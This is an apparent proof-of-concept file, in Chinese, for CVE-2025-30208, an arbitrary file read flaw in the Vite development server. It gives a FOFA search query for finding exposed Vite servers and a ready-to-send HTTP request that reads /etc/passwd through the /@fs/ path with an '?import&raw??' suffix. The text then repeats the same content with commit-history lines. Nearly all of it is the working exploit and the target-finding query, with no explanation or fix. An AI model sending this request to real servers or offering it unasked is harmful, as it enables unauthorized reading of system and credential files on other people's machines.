POC/wpoc/Vite开发服务器/CVE-2025-30208任意文件读取.md

## CVE-2025-30208任意文件读取


## fofa
```
body="/@vite/client"
```

## POC
```
GET /@fs/etc/passwd?import&raw?? HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Content-Type: application/x-www-form-urlencoded
Content-Length: 94


```
Update CVE-2025-30208任意文件读取.md 2025-03-31 14:26:48 +08:00			`## CVE-2025-30208任意文件读取`


			`## fofa`
			```
			`body="/@vite/client"`
			```

			`## POC`
			```
			`GET /@fs/etc/passwd?import&raw?? HTTP/1.1`
			`Host: 127.0.0.1`
			`User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0`
			`Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8`
			`Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2`
			`Accept-Encoding: gzip, deflate, br`
			`Connection: keep-alive`
			`Upgrade-Insecure-Requests: 1`
			`Priority: u=0, i`
			`Content-Type: application/x-www-form-urlencoded`
			`Content-Length: 94`


			```
Create 任意文件读取.md 2025-03-31 14:22:49 +08:00